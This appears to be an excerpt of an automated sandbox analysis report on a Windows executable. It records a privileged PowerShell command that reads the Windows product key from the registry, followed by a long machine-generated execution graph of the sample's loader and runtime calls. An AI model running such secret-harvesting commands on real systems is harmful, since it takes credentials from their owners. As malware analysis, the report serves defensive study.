                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                            Start time:02:37:51
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                            Start time:02:37:52
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.5%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:14.2%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:35
                                                                                                                                                                                                                              execution_graph 18975 7ff7f91fb040 18976 7ff7f91fb045 18975->18976 18980 7ff7f91fb05a 18975->18980 18981 7ff7f91fb060 18976->18981 18982 7ff7f91fb0a2 18981->18982 18983 7ff7f91fb0aa 18981->18983 18984 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18982->18984 18985 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18983->18985 18984->18983 18986 7ff7f91fb0b7 18985->18986 18987 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18986->18987 18988 7ff7f91fb0c4 18987->18988 18989 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18988->18989 18990 7ff7f91fb0d1 18989->18990 18991 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18990->18991 18992 7ff7f91fb0de 18991->18992 18993 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18992->18993 18994 7ff7f91fb0eb 18993->18994 18995 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18994->18995 18996 7ff7f91fb0f8 18995->18996 18997 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18996->18997 18998 7ff7f91fb105 18997->18998 18999 7ff7f91fa9b8 __free_lconv_mon 11 API calls 18998->18999 19000 7ff7f91fb115 18999->19000 19001 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19000->19001 19002 7ff7f91fb125 19001->19002 19007 7ff7f91faf04 19002->19007 19021 7ff7f9200348 EnterCriticalSection 19007->19021 20470 7ff7f91f9dc0 20473 7ff7f91f9d3c 20470->20473 20480 7ff7f9200348 EnterCriticalSection 20473->20480 20484 7ff7f91ecbc0 20485 7ff7f91ecbd0 20484->20485 20501 7ff7f91f9c18 20485->20501 20487 7ff7f91ecbdc 20507 7ff7f91eceb8 20487->20507 20489 7ff7f91ecbf4 _RTC_Initialize 20499 7ff7f91ecc49 20489->20499 20512 7ff7f91ed068 20489->20512 20490 7ff7f91ed19c 7 API calls 20491 7ff7f91ecc75 20490->20491 20493 7ff7f91ecc09 20515 7ff7f91f9084 20493->20515 20499->20490 20500 7ff7f91ecc65 20499->20500 20502 7ff7f91f9c29 20501->20502 20503 7ff7f91f4f78 _get_daylight 11 API calls 20502->20503 20506 7ff7f91f9c31 20502->20506 20504 7ff7f91f9c40 20503->20504 20505 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 20504->20505 20505->20506 20506->20487 20508 7ff7f91ecec9 20507->20508 20511 7ff7f91ecece __scrt_release_startup_lock 20507->20511 20509 7ff7f91ed19c 7 API calls 20508->20509 20508->20511 20510 7ff7f91ecf42 20509->20510 20511->20489 20540 7ff7f91ed02c 20512->20540 20514 7ff7f91ed071 20514->20493 20516 7ff7f91f90a4 20515->20516 20538 7ff7f91ecc15 20515->20538 20517 7ff7f91f90c2 GetModuleFileNameW 20516->20517 20518 7ff7f91f90ac 20516->20518 20522 7ff7f91f90ed 20517->20522 20519 7ff7f91f4f78 _get_daylight 11 API calls 20518->20519 20520 7ff7f91f90b1 20519->20520 20521 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 20520->20521 20521->20538 20523 7ff7f91f9024 11 API calls 20522->20523 20524 7ff7f91f912d 20523->20524 20525 7ff7f91f9135 20524->20525 20528 7ff7f91f914d 20524->20528 20526 7ff7f91f4f78 _get_daylight 11 API calls 20525->20526 20527 7ff7f91f913a 20526->20527 20530 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20527->20530 20529 7ff7f91f916f 20528->20529 20532 7ff7f91f91b4 20528->20532 20533 7ff7f91f919b 20528->20533 20531 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20529->20531 20530->20538 20531->20538 20536 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20532->20536 20534 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20533->20534 20535 7ff7f91f91a4 20534->20535 20537 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20535->20537 20536->20529 20537->20538 20538->20499 20539 7ff7f91ed13c InitializeSListHead 20538->20539 20541 7ff7f91ed046 20540->20541 20543 7ff7f91ed03f 20540->20543 20544 7ff7f91fa25c 20541->20544 20543->20514 20547 7ff7f91f9e98 20544->20547 20554 7ff7f9200348 EnterCriticalSection 20547->20554 19023 7ff7f920ac53 19025 7ff7f920ac63 19023->19025 19027 7ff7f91f54e8 LeaveCriticalSection 19025->19027 16037 7ff7f91f99d1 16049 7ff7f91fa448 16037->16049 16054 7ff7f91fb1c0 GetLastError 16049->16054 16055 7ff7f91fb1e4 FlsGetValue 16054->16055 16056 7ff7f91fb201 FlsSetValue 16054->16056 16057 7ff7f91fb1fb 16055->16057 16059 7ff7f91fb1f1 SetLastError 16055->16059 16058 7ff7f91fb213 16056->16058 16056->16059 16057->16056 16085 7ff7f91fec08 16058->16085 16062 7ff7f91fb28d 16059->16062 16063 7ff7f91fa451 16059->16063 16065 7ff7f91fa574 __GetCurrentState 38 API calls 16062->16065 16076 7ff7f91fa574 16063->16076 16064 7ff7f91fb222 16066 7ff7f91fb240 FlsSetValue 16064->16066 16067 7ff7f91fb230 FlsSetValue 16064->16067 16068 7ff7f91fb292 16065->16068 16070 7ff7f91fb25e 16066->16070 16071 7ff7f91fb24c FlsSetValue 16066->16071 16069 7ff7f91fb239 16067->16069 16092 7ff7f91fa9b8 16069->16092 16098 7ff7f91faf64 16070->16098 16071->16069 16146 7ff7f92036c0 16076->16146 16090 7ff7f91fec19 _get_daylight 16085->16090 16086 7ff7f91fec6a 16106 7ff7f91f4f78 16086->16106 16087 7ff7f91fec4e HeapAlloc 16088 7ff7f91fec68 16087->16088 16087->16090 16088->16064 16090->16086 16090->16087 16103 7ff7f9203600 16090->16103 16093 7ff7f91fa9bd RtlFreeHeap 16092->16093 16097 7ff7f91fa9ec 16092->16097 16094 7ff7f91fa9d8 GetLastError 16093->16094 16093->16097 16095 7ff7f91fa9e5 __free_lconv_mon 16094->16095 16096 7ff7f91f4f78 _get_daylight 9 API calls 16095->16096 16096->16097 16097->16059 16132 7ff7f91fae3c 16098->16132 16109 7ff7f9203640 16103->16109 16115 7ff7f91fb338 GetLastError 16106->16115 16108 7ff7f91f4f81 16108->16088 16114 7ff7f9200348 EnterCriticalSection 16109->16114 16116 7ff7f91fb379 FlsSetValue 16115->16116 16120 7ff7f91fb35c 16115->16120 16117 7ff7f91fb38b 16116->16117 16121 7ff7f91fb369 16116->16121 16119 7ff7f91fec08 _get_daylight 5 API calls 16117->16119 16118 7ff7f91fb3e5 SetLastError 16118->16108 16122 7ff7f91fb39a 16119->16122 16120->16116 16120->16121 16121->16118 16123 7ff7f91fb3b8 FlsSetValue 16122->16123 16124 7ff7f91fb3a8 FlsSetValue 16122->16124 16125 7ff7f91fb3d6 16123->16125 16126 7ff7f91fb3c4 FlsSetValue 16123->16126 16127 7ff7f91fb3b1 16124->16127 16129 7ff7f91faf64 _get_daylight 5 API calls 16125->16129 16126->16127 16128 7ff7f91fa9b8 __free_lconv_mon 5 API calls 16127->16128 16128->16121 16130 7ff7f91fb3de 16129->16130 16131 7ff7f91fa9b8 __free_lconv_mon 5 API calls 16130->16131 16131->16118 16144 7ff7f9200348 EnterCriticalSection 16132->16144 16180 7ff7f9203678 16146->16180 16185 7ff7f9200348 EnterCriticalSection 16180->16185 16250 7ff7f91ebb50 16251 7ff7f91ebb7e 16250->16251 16252 7ff7f91ebb65 16250->16252 16252->16251 16255 7ff7f91fd66c 16252->16255 16256 7ff7f91fd67b _get_daylight 16255->16256 16257 7ff7f91fd6b7 16255->16257 16256->16257 16258 7ff7f91fd69e HeapAlloc 16256->16258 16261 7ff7f9203600 _get_daylight 2 API calls 16256->16261 16259 7ff7f91f4f78 _get_daylight 11 API calls 16257->16259 16258->16256 16260 7ff7f91ebbde 16258->16260 16259->16260 16261->16256 20360 7ff7f9201720 20371 7ff7f9207454 20360->20371 20372 7ff7f9207461 20371->20372 20373 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20372->20373 20374 7ff7f920747d 20372->20374 20373->20372 20375 7ff7f91fa9b8 __free_lconv_mon 11 API calls 20374->20375 20376 7ff7f9201729 20374->20376 20375->20374 20377 7ff7f9200348 EnterCriticalSection 20376->20377 18862 7ff7f91f5698 18863 7ff7f91f56b2 18862->18863 18864 7ff7f91f56cf 18862->18864 18866 7ff7f91f4f58 _fread_nolock 11 API calls 18863->18866 18864->18863 18865 7ff7f91f56e2 CreateFileW 18864->18865 18867 7ff7f91f5716 18865->18867 18868 7ff7f91f574c 18865->18868 18869 7ff7f91f56b7 18866->18869 18887 7ff7f91f57ec GetFileType 18867->18887 18913 7ff7f91f5c74 18868->18913 18870 7ff7f91f4f78 _get_daylight 11 API calls 18869->18870 18873 7ff7f91f56bf 18870->18873 18876 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18873->18876 18882 7ff7f91f56ca 18876->18882 18877 7ff7f91f5741 CloseHandle 18877->18882 18878 7ff7f91f572b CloseHandle 18878->18882 18879 7ff7f91f5755 18883 7ff7f91f4eec _fread_nolock 11 API calls 18879->18883 18880 7ff7f91f5780 18934 7ff7f91f5a34 18880->18934 18886 7ff7f91f575f 18883->18886 18886->18882 18888 7ff7f91f583a 18887->18888 18889 7ff7f91f58f7 18887->18889 18892 7ff7f91f5866 GetFileInformationByHandle 18888->18892 18897 7ff7f91f5b70 21 API calls 18888->18897 18890 7ff7f91f5921 18889->18890 18891 7ff7f91f58ff 18889->18891 18896 7ff7f91f5944 PeekNamedPipe 18890->18896 18902 7ff7f91f58e2 18890->18902 18893 7ff7f91f5903 18891->18893 18894 7ff7f91f5912 GetLastError 18891->18894 18892->18894 18895 7ff7f91f588f 18892->18895 18898 7ff7f91f4f78 _get_daylight 11 API calls 18893->18898 18900 7ff7f91f4eec _fread_nolock 11 API calls 18894->18900 18899 7ff7f91f5a34 51 API calls 18895->18899 18896->18902 18901 7ff7f91f5854 18897->18901 18898->18902 18903 7ff7f91f589a 18899->18903 18900->18902 18901->18892 18901->18902 18904 7ff7f91ec5c0 _log10_special 8 API calls 18902->18904 18951 7ff7f91f5994 18903->18951 18906 7ff7f91f5724 18904->18906 18906->18877 18906->18878 18908 7ff7f91f5994 10 API calls 18909 7ff7f91f58b9 18908->18909 18910 7ff7f91f5994 10 API calls 18909->18910 18911 7ff7f91f58ca 18910->18911 18911->18902 18912 7ff7f91f4f78 _get_daylight 11 API calls 18911->18912 18912->18902 18914 7ff7f91f5caa 18913->18914 18915 7ff7f91f5d42 __std_exception_destroy 18914->18915 18916 7ff7f91f4f78 _get_daylight 11 API calls 18914->18916 18917 7ff7f91ec5c0 _log10_special 8 API calls 18915->18917 18918 7ff7f91f5cbc 18916->18918 18920 7ff7f91f5751 18917->18920 18919 7ff7f91f4f78 _get_daylight 11 API calls 18918->18919 18921 7ff7f91f5cc4 18919->18921 18920->18879 18920->18880 18922 7ff7f91f7e78 45 API calls 18921->18922 18923 7ff7f91f5cd9 18922->18923 18924 7ff7f91f5ce1 18923->18924 18925 7ff7f91f5ceb 18923->18925 18926 7ff7f91f4f78 _get_daylight 11 API calls 18924->18926 18927 7ff7f91f4f78 _get_daylight 11 API calls 18925->18927 18930 7ff7f91f5ce6 18926->18930 18928 7ff7f91f5cf0 18927->18928 18928->18915 18929 7ff7f91f4f78 _get_daylight 11 API calls 18928->18929 18931 7ff7f91f5cfa 18929->18931 18930->18915 18932 7ff7f91f5d34 GetDriveTypeW 18930->18932 18933 7ff7f91f7e78 45 API calls 18931->18933 18932->18915 18933->18930 18935 7ff7f91f5a5c 18934->18935 18936 7ff7f91f578d 18935->18936 18958 7ff7f91ff794 18935->18958 18944 7ff7f91f5b70 18936->18944 18938 7ff7f91f5af0 18938->18936 18939 7ff7f91ff794 51 API calls 18938->18939 18940 7ff7f91f5b03 18939->18940 18940->18936 18941 7ff7f91ff794 51 API calls 18940->18941 18942 7ff7f91f5b16 18941->18942 18942->18936 18943 7ff7f91ff794 51 API calls 18942->18943 18943->18936 18945 7ff7f91f5b8a 18944->18945 18946 7ff7f91f5bc1 18945->18946 18947 7ff7f91f5b9a 18945->18947 18948 7ff7f91ff628 21 API calls 18946->18948 18949 7ff7f91f4eec _fread_nolock 11 API calls 18947->18949 18950 7ff7f91f5baa 18947->18950 18948->18950 18949->18950 18950->18886 18952 7ff7f91f59b0 18951->18952 18953 7ff7f91f59bd FileTimeToSystemTime 18951->18953 18952->18953 18955 7ff7f91f59b8 18952->18955 18954 7ff7f91f59d1 SystemTimeToTzSpecificLocalTime 18953->18954 18953->18955 18954->18955 18956 7ff7f91ec5c0 _log10_special 8 API calls 18955->18956 18957 7ff7f91f58a9 18956->18957 18957->18908 18959 7ff7f91ff7a1 18958->18959 18960 7ff7f91ff7c5 18958->18960 18959->18960 18961 7ff7f91ff7a6 18959->18961 18962 7ff7f91ff7ff 18960->18962 18965 7ff7f91ff81e 18960->18965 18963 7ff7f91f4f78 _get_daylight 11 API calls 18961->18963 18964 7ff7f91f4f78 _get_daylight 11 API calls 18962->18964 18966 7ff7f91ff7ab 18963->18966 18967 7ff7f91ff804 18964->18967 18968 7ff7f91f4fbc 45 API calls 18965->18968 18969 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18966->18969 18971 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18967->18971 18974 7ff7f91ff82b 18968->18974 18970 7ff7f91ff7b6 18969->18970 18970->18938 18973 7ff7f91ff80f 18971->18973 18972 7ff7f920054c 51 API calls 18972->18974 18973->18938 18974->18972 18974->18973 16262 7ff7f91eccac 16283 7ff7f91ece7c 16262->16283 16265 7ff7f91ecdf8 16437 7ff7f91ed19c IsProcessorFeaturePresent 16265->16437 16266 7ff7f91eccc8 __scrt_acquire_startup_lock 16268 7ff7f91ece02 16266->16268 16273 7ff7f91ecce6 __scrt_release_startup_lock 16266->16273 16269 7ff7f91ed19c 7 API calls 16268->16269 16271 7ff7f91ece0d __GetCurrentState 16269->16271 16270 7ff7f91ecd0b 16272 7ff7f91ecd91 16289 7ff7f91ed2e4 16272->16289 16273->16270 16273->16272 16426 7ff7f91f9b9c 16273->16426 16275 7ff7f91ecd96 16292 7ff7f91e1000 16275->16292 16280 7ff7f91ecdb9 16280->16271 16433 7ff7f91ed000 16280->16433 16284 7ff7f91ece84 16283->16284 16285 7ff7f91ece90 __scrt_dllmain_crt_thread_attach 16284->16285 16286 7ff7f91ece9d 16285->16286 16288 7ff7f91eccc0 16285->16288 16286->16288 16444 7ff7f91ed8f8 16286->16444 16288->16265 16288->16266 16471 7ff7f920a540 16289->16471 16293 7ff7f91e1009 16292->16293 16473 7ff7f91f54f4 16293->16473 16295 7ff7f91e37fb 16480 7ff7f91e36b0 16295->16480 16300 7ff7f91ec5c0 _log10_special 8 API calls 16303 7ff7f91e3ca7 16300->16303 16301 7ff7f91e383c 16640 7ff7f91e1c80 16301->16640 16302 7ff7f91e391b 16649 7ff7f91e45b0 16302->16649 16431 7ff7f91ed328 GetModuleHandleW 16303->16431 16306 7ff7f91e385b 16552 7ff7f91e8a20 16306->16552 16309 7ff7f91e396a 16672 7ff7f91e2710 16309->16672 16311 7ff7f91e388e 16320 7ff7f91e38bb __std_exception_destroy 16311->16320 16644 7ff7f91e8b90 16311->16644 16313 7ff7f91e395d 16314 7ff7f91e3984 16313->16314 16315 7ff7f91e3962 16313->16315 16317 7ff7f91e1c80 49 API calls 16314->16317 16668 7ff7f91f00bc 16315->16668 16319 7ff7f91e39a3 16317->16319 16325 7ff7f91e1950 115 API calls 16319->16325 16321 7ff7f91e8a20 14 API calls 16320->16321 16328 7ff7f91e38de __std_exception_destroy 16320->16328 16321->16328 16323 7ff7f91e3a0b 16324 7ff7f91e8b90 40 API calls 16323->16324 16326 7ff7f91e3a17 16324->16326 16327 7ff7f91e39ce 16325->16327 16329 7ff7f91e8b90 40 API calls 16326->16329 16327->16306 16330 7ff7f91e39de 16327->16330 16334 7ff7f91e390e __std_exception_destroy 16328->16334 16683 7ff7f91e8b30 16328->16683 16331 7ff7f91e3a23 16329->16331 16332 7ff7f91e2710 54 API calls 16330->16332 16333 7ff7f91e8b90 40 API calls 16331->16333 16374 7ff7f91e3808 __std_exception_destroy 16332->16374 16333->16334 16335 7ff7f91e8a20 14 API calls 16334->16335 16336 7ff7f91e3a3b 16335->16336 16337 7ff7f91e3a60 __std_exception_destroy 16336->16337 16338 7ff7f91e3b2f 16336->16338 16340 7ff7f91e8b30 40 API calls 16337->16340 16351 7ff7f91e3aab 16337->16351 16339 7ff7f91e2710 54 API calls 16338->16339 16339->16374 16340->16351 16341 7ff7f91e8a20 14 API calls 16342 7ff7f91e3bf4 __std_exception_destroy 16341->16342 16343 7ff7f91e3c46 16342->16343 16344 7ff7f91e3d41 16342->16344 16345 7ff7f91e3cd4 16343->16345 16346 7ff7f91e3c50 16343->16346 16690 7ff7f91e44d0 16344->16690 16349 7ff7f91e8a20 14 API calls 16345->16349 16565 7ff7f91e90e0 16346->16565 16353 7ff7f91e3ce0 16349->16353 16350 7ff7f91e3d4f 16354 7ff7f91e3d65 16350->16354 16355 7ff7f91e3d71 16350->16355 16351->16341 16356 7ff7f91e3c61 16353->16356 16359 7ff7f91e3ced 16353->16359 16693 7ff7f91e4620 16354->16693 16358 7ff7f91e1c80 49 API calls 16355->16358 16361 7ff7f91e2710 54 API calls 16356->16361 16368 7ff7f91e3cc8 __std_exception_destroy 16358->16368 16362 7ff7f91e1c80 49 API calls 16359->16362 16361->16374 16365 7ff7f91e3d0b 16362->16365 16363 7ff7f91e3dc4 16615 7ff7f91e9400 16363->16615 16367 7ff7f91e3d12 16365->16367 16365->16368 16372 7ff7f91e2710 54 API calls 16367->16372 16368->16363 16369 7ff7f91e3da7 SetDllDirectoryW LoadLibraryExW 16368->16369 16369->16363 16370 7ff7f91e3dd7 SetDllDirectoryW 16373 7ff7f91e3e0a 16370->16373 16417 7ff7f91e3e5a 16370->16417 16372->16374 16375 7ff7f91e8a20 14 API calls 16373->16375 16374->16300 16383 7ff7f91e3e16 __std_exception_destroy 16375->16383 16376 7ff7f91e3ffc 16377 7ff7f91e4006 PostMessageW GetMessageW 16376->16377 16378 7ff7f91e4029 16376->16378 16377->16378 16770 7ff7f91e3360 16378->16770 16379 7ff7f91e3f1b 16620 7ff7f91e33c0 16379->16620 16386 7ff7f91e3ef2 16383->16386 16390 7ff7f91e3e4e 16383->16390 16389 7ff7f91e8b30 40 API calls 16386->16389 16389->16417 16390->16417 16696 7ff7f91e6db0 16390->16696 16395 7ff7f91e6fb0 FreeLibrary 16398 7ff7f91e404f 16395->16398 16403 7ff7f91e3e81 16406 7ff7f91e3ea2 16403->16406 16419 7ff7f91e3e85 16403->16419 16717 7ff7f91e6df0 16403->16717 16406->16419 16736 7ff7f91e71a0 16406->16736 16417->16376 16417->16379 16419->16417 16752 7ff7f91e2a50 16419->16752 16427 7ff7f91f9bd4 16426->16427 16428 7ff7f91f9bb3 16426->16428 16429 7ff7f91fa448 45 API calls 16427->16429 16428->16272 16430 7ff7f91f9bd9 16429->16430 16432 7ff7f91ed339 16431->16432 16432->16280 16434 7ff7f91ed011 16433->16434 16435 7ff7f91ecdd0 16434->16435 16436 7ff7f91ed8f8 7 API calls 16434->16436 16435->16270 16436->16435 16438 7ff7f91ed1c2 _isindst memcpy_s 16437->16438 16439 7ff7f91ed1e1 RtlCaptureContext RtlLookupFunctionEntry 16438->16439 16440 7ff7f91ed246 memcpy_s 16439->16440 16441 7ff7f91ed20a RtlVirtualUnwind 16439->16441 16442 7ff7f91ed278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16440->16442 16441->16440 16443 7ff7f91ed2c6 _isindst 16442->16443 16443->16268 16445 7ff7f91ed900 16444->16445 16446 7ff7f91ed90a 16444->16446 16450 7ff7f91edc94 16445->16450 16446->16288 16451 7ff7f91edca3 16450->16451 16452 7ff7f91ed905 16450->16452 16458 7ff7f91eded0 16451->16458 16454 7ff7f91edd00 16452->16454 16455 7ff7f91edd2b 16454->16455 16456 7ff7f91edd2f 16455->16456 16457 7ff7f91edd0e DeleteCriticalSection 16455->16457 16456->16446 16457->16455 16462 7ff7f91edd38 16458->16462 16463 7ff7f91ede22 TlsFree 16462->16463 16469 7ff7f91edd7c __vcrt_InitializeCriticalSectionEx 16462->16469 16464 7ff7f91eddaa LoadLibraryExW 16466 7ff7f91eddcb GetLastError 16464->16466 16467 7ff7f91ede49 16464->16467 16465 7ff7f91ede69 GetProcAddress 16465->16463 16466->16469 16467->16465 16468 7ff7f91ede60 FreeLibrary 16467->16468 16468->16465 16469->16463 16469->16464 16469->16465 16470 7ff7f91edded LoadLibraryExW 16469->16470 16470->16467 16470->16469 16472 7ff7f91ed2fb GetStartupInfoW 16471->16472 16472->16275 16474 7ff7f91ff4f0 16473->16474 16476 7ff7f91ff596 16474->16476 16477 7ff7f91ff543 16474->16477 16475 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 16479 7ff7f91ff56c 16475->16479 16783 7ff7f91ff3c8 16476->16783 16477->16475 16479->16295 16791 7ff7f91ec8c0 16480->16791 16483 7ff7f91e3710 16793 7ff7f91e92f0 FindFirstFileExW 16483->16793 16484 7ff7f91e36eb GetLastError 16798 7ff7f91e2c50 16484->16798 16487 7ff7f91e3706 16491 7ff7f91ec5c0 _log10_special 8 API calls 16487->16491 16489 7ff7f91e3723 16813 7ff7f91e9370 CreateFileW 16489->16813 16490 7ff7f91e377d 16824 7ff7f91e94b0 16490->16824 16495 7ff7f91e37b5 16491->16495 16494 7ff7f91e378b 16494->16487 16499 7ff7f91e2810 49 API calls 16494->16499 16495->16374 16502 7ff7f91e1950 16495->16502 16497 7ff7f91e3734 16816 7ff7f91e2810 16497->16816 16498 7ff7f91e374c __vcrt_InitializeCriticalSectionEx 16498->16490 16499->16487 16503 7ff7f91e45b0 108 API calls 16502->16503 16504 7ff7f91e1985 16503->16504 16505 7ff7f91e1c43 16504->16505 16507 7ff7f91e7f80 83 API calls 16504->16507 16506 7ff7f91ec5c0 _log10_special 8 API calls 16505->16506 16508 7ff7f91e1c5e 16506->16508 16509 7ff7f91e19cb 16507->16509 16508->16301 16508->16302 16551 7ff7f91e1a03 16509->16551 17197 7ff7f91f0744 16509->17197 16510 7ff7f91f00bc 74 API calls 16510->16505 16512 7ff7f91e19e5 16513 7ff7f91e1a08 16512->16513 16514 7ff7f91e19e9 16512->16514 17201 7ff7f91f040c 16513->17201 16515 7ff7f91f4f78 _get_daylight 11 API calls 16514->16515 16517 7ff7f91e19ee 16515->16517 17204 7ff7f91e2910 16517->17204 16520 7ff7f91e1a26 16522 7ff7f91f4f78 _get_daylight 11 API calls 16520->16522 16521 7ff7f91e1a45 16524 7ff7f91e1a5c 16521->16524 16525 7ff7f91e1a7b 16521->16525 16523 7ff7f91e1a2b 16522->16523 16526 7ff7f91e2910 54 API calls 16523->16526 16527 7ff7f91f4f78 _get_daylight 11 API calls 16524->16527 16528 7ff7f91e1c80 49 API calls 16525->16528 16526->16551 16529 7ff7f91e1a61 16527->16529 16530 7ff7f91e1a92 16528->16530 16531 7ff7f91e2910 54 API calls 16529->16531 16532 7ff7f91e1c80 49 API calls 16530->16532 16531->16551 16533 7ff7f91e1add 16532->16533 16534 7ff7f91f0744 73 API calls 16533->16534 16535 7ff7f91e1b01 16534->16535 16536 7ff7f91e1b16 16535->16536 16537 7ff7f91e1b35 16535->16537 16538 7ff7f91f4f78 _get_daylight 11 API calls 16536->16538 16539 7ff7f91f040c _fread_nolock 53 API calls 16537->16539 16540 7ff7f91e1b1b 16538->16540 16541 7ff7f91e1b4a 16539->16541 16542 7ff7f91e2910 54 API calls 16540->16542 16543 7ff7f91e1b50 16541->16543 16544 7ff7f91e1b6f 16541->16544 16542->16551 16545 7ff7f91f4f78 _get_daylight 11 API calls 16543->16545 17219 7ff7f91f0180 16544->17219 16547 7ff7f91e1b55 16545->16547 16549 7ff7f91e2910 54 API calls 16547->16549 16549->16551 16550 7ff7f91e2710 54 API calls 16550->16551 16551->16510 16553 7ff7f91e8a2a 16552->16553 16554 7ff7f91e9400 2 API calls 16553->16554 16555 7ff7f91e8a49 GetEnvironmentVariableW 16554->16555 16556 7ff7f91e8a66 ExpandEnvironmentStringsW 16555->16556 16557 7ff7f91e8ab2 16555->16557 16556->16557 16558 7ff7f91e8a88 16556->16558 16559 7ff7f91ec5c0 _log10_special 8 API calls 16557->16559 16560 7ff7f91e94b0 2 API calls 16558->16560 16561 7ff7f91e8ac4 16559->16561 16562 7ff7f91e8a9a 16560->16562 16561->16311 16563 7ff7f91ec5c0 _log10_special 8 API calls 16562->16563 16564 7ff7f91e8aaa 16563->16564 16564->16311 16566 7ff7f91e90f5 16565->16566 17437 7ff7f91e8760 GetCurrentProcess OpenProcessToken 16566->17437 16569 7ff7f91e8760 7 API calls 16570 7ff7f91e9121 16569->16570 16571 7ff7f91e9154 16570->16571 16572 7ff7f91e913a 16570->16572 16574 7ff7f91e26b0 48 API calls 16571->16574 16573 7ff7f91e26b0 48 API calls 16572->16573 16575 7ff7f91e9152 16573->16575 16576 7ff7f91e9167 LocalFree LocalFree 16574->16576 16575->16576 16577 7ff7f91e9183 16576->16577 16580 7ff7f91e918f 16576->16580 17447 7ff7f91e2b50 16577->17447 16579 7ff7f91ec5c0 _log10_special 8 API calls 16581 7ff7f91e3c55 16579->16581 16580->16579 16581->16356 16582 7ff7f91e8850 16581->16582 16583 7ff7f91e8868 16582->16583 16584 7ff7f91e888c 16583->16584 16585 7ff7f91e88ea GetTempPathW GetCurrentProcessId 16583->16585 16587 7ff7f91e8a20 14 API calls 16584->16587 17456 7ff7f91e25c0 16585->17456 16588 7ff7f91e8898 16587->16588 17463 7ff7f91e81c0 16588->17463 16593 7ff7f91e88d8 __std_exception_destroy 16614 7ff7f91e89c4 __std_exception_destroy 16593->16614 16594 7ff7f91e8918 __std_exception_destroy 16601 7ff7f91e8955 __std_exception_destroy 16594->16601 17460 7ff7f91f8bd8 16594->17460 16597 7ff7f91e88be __std_exception_destroy 16597->16585 16603 7ff7f91e88cc 16597->16603 16600 7ff7f91ec5c0 _log10_special 8 API calls 16602 7ff7f91e3cbb 16600->16602 16606 7ff7f91e9400 2 API calls 16601->16606 16601->16614 16602->16356 16602->16368 16605 7ff7f91e2810 49 API calls 16603->16605 16605->16593 16607 7ff7f91e89a1 16606->16607 16608 7ff7f91e89a6 16607->16608 16609 7ff7f91e89d9 16607->16609 16610 7ff7f91e9400 2 API calls 16608->16610 16611 7ff7f91f82a8 38 API calls 16609->16611 16612 7ff7f91e89b6 16610->16612 16611->16614 16613 7ff7f91f82a8 38 API calls 16612->16613 16613->16614 16614->16600 16616 7ff7f91e9422 MultiByteToWideChar 16615->16616 16618 7ff7f91e9446 16615->16618 16616->16618 16619 7ff7f91e945c __std_exception_destroy 16616->16619 16617 7ff7f91e9463 MultiByteToWideChar 16617->16619 16618->16617 16618->16619 16619->16370 16631 7ff7f91e33ce memcpy_s 16620->16631 16621 7ff7f91ec5c0 _log10_special 8 API calls 16623 7ff7f91e3664 16621->16623 16622 7ff7f91e35c7 16622->16621 16623->16374 16639 7ff7f91e90c0 LocalFree 16623->16639 16625 7ff7f91e1c80 49 API calls 16625->16631 16626 7ff7f91e35e2 16628 7ff7f91e2710 54 API calls 16626->16628 16628->16622 16630 7ff7f91e35c9 16634 7ff7f91e2710 54 API calls 16630->16634 16631->16622 16631->16625 16631->16626 16631->16630 16633 7ff7f91e2a50 54 API calls 16631->16633 16637 7ff7f91e35d0 16631->16637 17752 7ff7f91e4550 16631->17752 17758 7ff7f91e7e10 16631->17758 17770 7ff7f91e1600 16631->17770 17818 7ff7f91e7110 16631->17818 17822 7ff7f91e4180 16631->17822 17866 7ff7f91e4440 16631->17866 16633->16631 16634->16622 16638 